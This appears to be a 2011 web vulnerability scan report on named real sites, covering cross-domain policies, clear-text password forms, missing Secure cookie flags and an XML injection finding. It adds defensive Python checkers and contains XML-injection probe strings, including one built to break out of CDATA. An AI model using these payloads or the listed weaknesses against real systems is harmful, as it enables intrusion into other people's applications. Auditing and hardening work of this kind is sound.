Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: api.bing.com
Response
HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 634
Content-Type: text/xml
Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT
ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Mon, 02 May 2011 22:23:14 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-05-02T22%3a23%3a14; expires=Thu, 12-May-2011 22:23:14 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=9657056B05E34F21B03456DFC654A712; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1753823&MS=1753823; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=EB15584ECD52449D90E326E400B536A2; expires=Wed, 01-May-2013 22:23:14 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110502; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.bing.com" he ...[SNIP]...
<allow-access-from domain="*.bing.com"/>
...[SNIP]...
<allow-access-from domain="blstc.msn.com"/>
...[SNIP]...
<allow-access-from domain="stc.sandblu.msn-int.com"/>
...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: edition.cnn.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:24:06 GMT Server: Apache Last-Modified: Fri, 03 Dec 2010 21:00:13 GMT Accept-Ranges: bytes Content-Length: 2326 Cache-Control: max-age=3600 Expires: Mon, 02 May 2011 23:23:21 GMT Content-Type: application/xml Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: en.camera.it
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/xml Last-Modified: Tue, 25 Jan 2011 15:13:43 GMT Vary: Accept-Encoding Content-Length: 1023 Date: Mon, 02 May 2011 23:56:10 GMT X-Varnish: 1575094938 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: dmzxmweb04 X-Cache: MISS
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: finanza-mercati.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:24:26 GMT Server: Apache/2.2.10 (Linux/SUSE) Last-Modified: Thu, 24 Mar 2011 07:09:47 GMT Accept-Ranges: bytes Content-Length: 218 Vary: User-Agent ETag: "2044e1-da-49f3529aa9469"-gzip Connection: close Content-Type: text/xml
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: friendfeed.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:24:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 321 Vary: Cookie Server: FriendFeedServer/0.1 Etag: "d69a789b2865b15041af5e97e97c7b933b34666a" Cache-Control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: AT=14162173952499924949_1304375087; Domain=.friendfeed.com; Path=/
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: giochi-tiscali.king.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:25:27 GMT Server: Apache Expires: Mon, 02 May 2011 22:35:27 GMT Content-Length: 2487 Content-Type: text/xml; charset=iso-8859-1 Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels"; Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: it.yahoo.com
Response
HTTP/1.0 200 OK Date: Mon, 02 May 2011 22:25:38 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: private Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT Accept-Ranges: bytes Content-Length: 228 Content-Type: application/xml Age: 0 Server: YTS/1.20.0
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: itunes.apple.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: nuovo.camera.it
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/xml Last-Modified: Tue, 25 Jan 2011 15:13:43 GMT Vary: Accept-Encoding Content-Length: 1023 Date: Mon, 02 May 2011 22:26:32 GMT X-Varnish: 132687829 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: dmzxmweb05 X-Cache: MISS
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Request
GET /crossdomain.xml HTTP/1.0 Host: static.ak.fbcdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-FB-Server: 10.138.64.186 Date: Mon, 02 May 2011 22:33:53 GMT Content-Length: 1473 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.eni.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 23:55:43 GMT Last-Modified: Fri, 12 Nov 2010 08:47:16 GMT ETag: "2caf6-148-232eed00" Accept-Ranges: bytes Content-Length: 328 Connection: close Content-Type: application/xml Set-Cookie: TS782077=2dff656feed00e0ad3df2bc60f4c0f7722f0b4bab3ec8bf54dbf447e; Path=/
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Request
GET /crossdomain.xml HTTP/1.0 Host: imagesdotcom.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:18:05 GMT Server: Apache/2.2.10 (Linux/SUSE) Last-Modified: Wed, 07 May 2008 05:43:55 GMT Accept-Ranges: bytes Content-Length: 133 Vary: Accept-Encoding,User-Agent ETag: "10dc6c-85-44c9d734f5cc0"-gzip Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Request
GET /crossdomain.xml HTTP/1.0 Host: job24.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:29:34 GMT Server: Apache/2.0.46 (CentOS) Last-Modified: Tue, 19 Feb 2008 14:13:10 GMT ETag: "81ee02-82-78e86980" Accept-Ranges: bytes Content-Length: 130 Connection: close Content-Type: text/xml
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
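Added example, not part of the scanner's report: a small Python classifier for both policy formats discussed here, crossdomain.xml for Flash and clientaccesspolicy.xml for Silverlight. It grades every allowed entry as "any domain", "wildcard" or "specific domain", which is the distinction the findings above and below draw. The sample policies are constructed with example.com hosts and are not the policies served by the hosts listed in this report.

```python
"""Classify Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml)
cross-domain policies by how widely they grant two-way access.

Added example; the sample policies below are constructed, not the ones the
hosts in this report actually serve."""
import xml.etree.ElementTree as ET

FLASH_WILDCARD = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-http-request-headers-from domain="*.example.com" headers="*"/>
  <allow-access-from domain="*.example.com"/>
  <allow-access-from domain="partner.example.net"/>
</cross-domain-policy>"""

FLASH_ANY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>"""

SILVERLIGHT_ANY = """<?xml version="1.0"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""

SILVERLIGHT_SPECIFIC = SILVERLIGHT_ANY.replace('uri="*"', 'uri="https://app.example.com"')


def allowed_domains(policy_xml):
    """Return the domain patterns the policy grants access to, for either format."""
    root = ET.fromstring(policy_xml)
    if root.tag == "cross-domain-policy":          # Flash: <allow-access-from domain=...>
        return [e.get("domain", "") for e in root.iter("allow-access-from")]
    if root.tag == "access-policy":                # Silverlight: <domain uri=...>
        return [e.get("uri", "") for e in root.iter("domain")]
    raise ValueError("not a cross-domain policy: <%s>" % root.tag)


def classify(policy_xml):
    """Grade each allowed entry: 'any domain' for a bare *, 'wildcard' for a
    pattern such as *.example.com, 'specific domain' otherwise. Sorted set."""
    grades = set()
    for d in allowed_domains(policy_xml):
        if d == "*":
            grades.add("any domain")
        elif "*" in d:
            grades.add("wildcard")
        else:
            grades.add("specific domain")
    return sorted(grades)


if __name__ == "__main__":
    for label, pol in [("flash wildcard", FLASH_WILDCARD), ("flash any", FLASH_ANY),
                       ("silverlight any", SILVERLIGHT_ANY),
                       ("silverlight specific", SILVERLIGHT_SPECIFIC)]:
        print("%-22s %s" % (label, ", ".join(classify(pol))))
```

To check a live host, fetch /crossdomain.xml and /clientaccesspolicy.xml from its web root and pass the response body to classify(). An "any domain" result on a site with any authenticated functionality is the high-risk case described above; a wildcard result needs the review of every host that could ever match the pattern that the findings ask for.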
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad-emea.doubleclick.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad78.neodatagroup.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:17:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT ETag: "5d8985-145-475babd3b7580" Accept-Ranges: bytes Content-Length: 325 Cache-Control: max-age=0 Expires: Mon, 02 May 2011 22:17:39 GMT Connection: close Content-Type: application/xml
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: adlev.neodatagroup.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:21:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT ETag: "5d8985-145-475babd3b7580" Accept-Ranges: bytes Content-Length: 325 Cache-Control: max-age=0 Expires: Mon, 02 May 2011 22:21:48 GMT Connection: close Content-Type: application/xml
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: cdn1.eyewonder.com
Response
HTTP/1.0 200 OK Content-Length: 261 Content-Type: text/xml Last-Modified: Wed, 08 Oct 2008 19:49:12 GMT Accept-Ranges: bytes ETag: "12b0cf07e29c91:13a0" Server: Microsoft-IIS/6.0 p3p: policyref="/200125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM" X-Powered-By: ASP.NET Cache-Control: max-age=3559 Date: Mon, 02 May 2011 22:17:05 GMT Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: elstatic.weborama.fr
Response
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=604800 Content-Type: text/xml Date: Mon, 02 May 2011 23:05:02 GMT ETag: "820671401" Expires: Mon, 09 May 2011 23:05:02 GMT Last-Modified: Wed, 12 May 2010 19:52:17 GMT Server: ECAcc (dca/5370) X-Cache: HIT Content-Length: 298 Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ieo.solution.weborama.fr
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 23:04:57 GMT Server: Apache Last-Modified: Wed, 12 May 2010 19:39:08 GMT ETag: "68008-12a-4866acba3af00" Accept-Ranges: bytes Content-Length: 298 Connection: close Content-Type: application/xml
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:17:44 GMT Server: Omniture DC/2.0.0 xserver: www12 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: omniture.virgilio.it
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:16:17 GMT Server: Omniture DC/2.0.0 xserver: www22 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: secure-it.imrworldwide.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:17:43 GMT Server: Apache Cache-Control: max-age=604800 Expires: Mon, 09 May 2011 22:17:43 GMT Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT ETag: "ff-4adbc4fc" Accept-Ranges: bytes Content-Length: 255 Connection: close Content-Type: application/xml
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: api.bing.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Content-Length: 348 Content-Type: text/xml Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml" Date: Mon, 02 May 2011 22:23:14 GMT Connection: close Set-Cookie: _MD=alg=m2&C=2011-05-02T22%3a23%3a14; expires=Thu, 12-May-2011 22:23:14 GMT; domain=.bing.com; path=/ Set-Cookie: _SS=SID=20E8C6C83AEB492C83715B7C9D6D2BC0; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/ Set-Cookie: SRCHD=D=1753823&MS=1753823; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/ Set-Cookie: SRCHUID=V=2&GUID=BCC05BE254104E4CA7552CD9C2BBFAF8; expires=Wed, 01-May-2013 22:23:14 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110502; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (TLS; every version of SSL is obsolete and should be disabled) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the Secure flag should be set to prevent transmission over clear-text HTTP. The page that carries the login form must itself be served over TLS, not only the form's target: a login page delivered over plain HTTP can be rewritten in transit to post the password anywhere.
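Added example, not from the scanner: the check behind this finding, written in Python and run over a constructed page. It resolves each form's action against the URL the page was served from and reports forms that contain a password field but would not submit over HTTPS. The host du.example.com and the HTML are constructed stand-ins, not the real responses quoted below.

```python
"""Flag HTML forms that would submit a password over clear-text HTTP.

Added example; the page URL and HTML below are constructed, not taken from
any host in this report."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class PasswordFormFinder(HTMLParser):
    """Collect (resolved action URL, has-password-field) for every <form>."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            # An absent or empty action means "submit to the page's own URL".
            self._current = [urljoin(self.page_url, a.get("action", "")), False]
        elif tag == "input" and self._current is not None \
                and a.get("type", "").lower() == "password":
            self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None


def insecure_password_forms(page_url, html):
    """Return the action URLs of password forms whose submission is not HTTPS."""
    parser = PasswordFormFinder(page_url)
    parser.feed(html)
    parser.close()
    return [action for action, has_pw in parser.forms
            if has_pw and urlsplit(action).scheme != "https"]


# Constructed page: one relative password form (inherits the page's scheme),
# one absolute HTTPS password form, one form with no password at all.
SAMPLE_HTML = """<html><body>
<form action="/utenti/Login.aspx" method="post">
  <input type="text" name="user"><input type="password" name="pwd">
</form>
<form action="https://secure.example.com/login" method="post">
  <input type="text" name="user"><input type="PASSWORD" name="pwd">
</form>
<form action="/search"><input type="text" name="q"></form>
</body></html>"""

if __name__ == "__main__":
    page = "http://du.example.com/utenti/Registrazione.aspx"
    for action in insecure_password_forms(page, SAMPLE_HTML):
        print("password submitted over clear text to", action)
```

A form whose action resolves to HTTPS is still not safe when the page carrying it arrived over plain HTTP, because the page, action included, can be rewritten in transit. That is why the remediation asks for the whole login flow to be under TLS, not just the submission.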
GET /utenti/Registrazione.aspx HTTP/1.1 Host: du.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:24:07 GMT Server: Microsoft-IIS/6.0 SERVER: PRODFE1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 60355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /utenti/facebook_connect.aspx HTTP/1.1 Host: du.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:24:07 GMT Server: Microsoft-IIS/6.0 SERVER: PRODFE1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 14607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:30:24 GMT Server: Apache Accept-Ranges: bytes Content-Length: 6649 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head>
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Issue background
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities, &lt; and &gt; (and & with &amp;; where input lands in an attribute value, the quote character must be escaped as well). The most reliable approach is to build the document with an XML library that escapes text nodes itself, rather than by string concatenation. Wrapping input in a CDATA section is not a defence, because the input can contain the ]]> terminator that ends the section.
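Added example, not from the report or the scanned application: the vulnerable pattern beside the hardened one in Python, using a constructed getQuote SOAP operation and a <symbol> element as hypothetical names. The first payload is the scanner's ]]>> style; the second terminates a CDATA section and injects a sibling element. The string-built request accepts both (one breaks the parser, the other changes the document), while the library-built request turns both into inert text.

```python
"""XML/SOAP injection: string-built request beside a library-built one.

Added example; the SOAP operation, element names and payloads are constructed
for illustration and are not the ones the scanned application uses."""
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"

# The scanner's payload style ("]]>" plus a stray ">") and a more deliberate one
# that closes the CDATA section and injects a sibling element.
PAYLOAD_MALFORM = "quotazioni.php]]>>"
PAYLOAD_INJECT = "MSFT]]><symbol>ADMIN</symbol><![CDATA["


def build_request_unsafe(symbol):
    """Vulnerable: user input concatenated into the message. Wrapping it in
    CDATA does not help, because the input can terminate the CDATA section."""
    return ('<soap:Envelope xmlns:soap="%s"><soap:Body><getQuote>'
            '<symbol><![CDATA[%s]]></symbol>'
            '</getQuote></soap:Body></soap:Envelope>' % (SOAP_NS, symbol))


def build_request_safe(symbol):
    """Hardened: the input becomes a text node and the serialiser escapes
    <, > and & itself, so it can never alter the document structure."""
    env = ET.Element("{%s}Envelope" % SOAP_NS)
    body = ET.SubElement(env, "{%s}Body" % SOAP_NS)
    op = ET.SubElement(body, "getQuote")
    ET.SubElement(op, "symbol").text = symbol
    return ET.tostring(env, encoding="unicode")


def symbols_seen_by_server(request_xml):
    """Parse the request as the server would; None if the parser rejects it,
    otherwise every <symbol> value the server would act on."""
    try:
        root = ET.fromstring(request_xml)
    except ET.ParseError:
        return None
    return [e.text for e in root.iter("symbol")]


if __name__ == "__main__":
    for payload in (PAYLOAD_MALFORM, PAYLOAD_INJECT):
        print("unsafe:", symbols_seen_by_server(build_request_unsafe(payload)))
        print("safe:  ", symbols_seen_by_server(build_request_safe(payload)))
```

If a library builder is not an option, xml.sax.saxutils.escape() applied to every text value (with quote characters added to its entity map for attribute values) is the minimum. Blocking < and > at validation time, as suggested above, also stops both payloads, at the cost of rejecting legitimate input that contains them.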
Request
GET /quotazioni.php]]>> HTTP/1.1 Host: finanza-mercati.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:28:53 GMT Server: Apache/2.2.10 (Linux/SUSE) Vary: accept-language,accept-charset,Accept-Encoding,User-Agent Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1062
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
9. Password returned in later response
Summary
Severity: Medium
Confidence: Firm
Host: http://www.genialloyd.it
Path: /GlfeWeb/area_personale/recupera_password.jsp
Issue description
Passwords submitted to the application are returned in clear form in later responses from the application. This behaviour increases the risk that users' passwords will be captured by an attacker. Many types of vulnerability, such as weaknesses in session handling, broken access controls, and cross-site scripting, would enable an attacker to leverage this behaviour to retrieve the passwords of other application users. This possibility typically exacerbates the impact of those other vulnerabilities, and in some situations can enable an attacker to quickly compromise the entire application.
Issue remediation
There is usually no good reason for an application to return users' passwords in its responses. This behaviour should be removed from the application.
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
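Added example, not from the scanner: a Set-Cookie audit in Python that flags cookies issued without the Secure flag, notes whether each looks like a session token and whether it carries HttpOnly, and shows the corresponding fix. The sample headers are modelled on cookies quoted in the instances below, with domain attributes replaced by example.com; the session-token heuristic is this example's own, not the scanner's.

```python
"""Audit Set-Cookie headers for the Secure flag (and HttpOnly), and show the
one-line fix a reverse proxy or framework setting would apply.

Added example; the sample headers are modelled on cookies quoted in this
section, with the domain attribute replaced by example.com."""
import re

SESSION_NAME_RE = re.compile(r"sess|sid|token|auth", re.IGNORECASE)


def parse_set_cookie(header_value):
    """Split a Set-Cookie value into (name, value, attrs); attribute names are
    lower-cased because browsers match them case-insensitively."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def looks_like_session_token(name, value):
    """Cheap heuristic (this example's own): a session-ish name, or a long
    opaque value with no obvious meaning."""
    return bool(SESSION_NAME_RE.search(name)) or (
        len(value) >= 16 and re.fullmatch(r"[A-Za-z0-9_\-!.:%]+", value) is not None)


def audit_cookies(set_cookie_headers):
    """Return one finding per cookie issued without the Secure flag."""
    findings = []
    for header in set_cookie_headers:
        name, value, attrs = parse_set_cookie(header)
        if "secure" in attrs:
            continue
        findings.append({"name": name,
                         "session": looks_like_session_token(name, value),
                         "httponly": "httponly" in attrs})
    return findings


def harden(header_value):
    """Append Secure and HttpOnly where missing, which is what a proxy rewrite
    rule or the framework's cookie settings should already be doing."""
    _, _, attrs = parse_set_cookie(header_value)
    out = header_value.rstrip().rstrip(";")
    if "secure" not in attrs:
        out += "; Secure"
    if "httponly" not in attrs:
        out += "; HttpOnly"
    return out


# Constructed sample, modelled on the cookies quoted in this section.
SAMPLE_HEADERS = [
    "PHPSESSID=bq4jvcopcniq8jdvo0dtnu3n95; path=/",
    "JSESSIONID_187CDAS=h72QN1ncLn59VV1nLzn2G6CN3GxcTPPH5rL1zPy022ctxnzFxMnC!-1329674579; path=/cdas187",
    "MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824641; path=/; domain=.example.com; HttpOnly",
    "lang=it; path=/; Secure",
    "theme=dark; path=/",
]

if __name__ == "__main__":
    for f in audit_cookies(SAMPLE_HEADERS):
        print("%-20s missing Secure; session-like=%s HttpOnly=%s"
              % (f["name"], f["session"], f["httponly"]))
    print(harden(SAMPLE_HEADERS[0]))
```

harden() is the proxy-side band-aid. The real fix is to set the flags where the cookie is issued, typically the framework's session configuration, and, as the remediation notes, never to let a session token reach a plain-HTTP URL at all.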
The following cookie was issued by the application and does not have the secure flag set:
PHPSESSID=bq4jvcopcniq8jdvo0dtnu3n95; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login.php HTTP/1.1 Host: account.musfiber.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/Main.dwt" codeOutsideHTMLIsLocked="false" --> <he ...[SNIP]...
Request
GET /auth/recuperapassword.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Request
GET /auth/registrautente.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Request
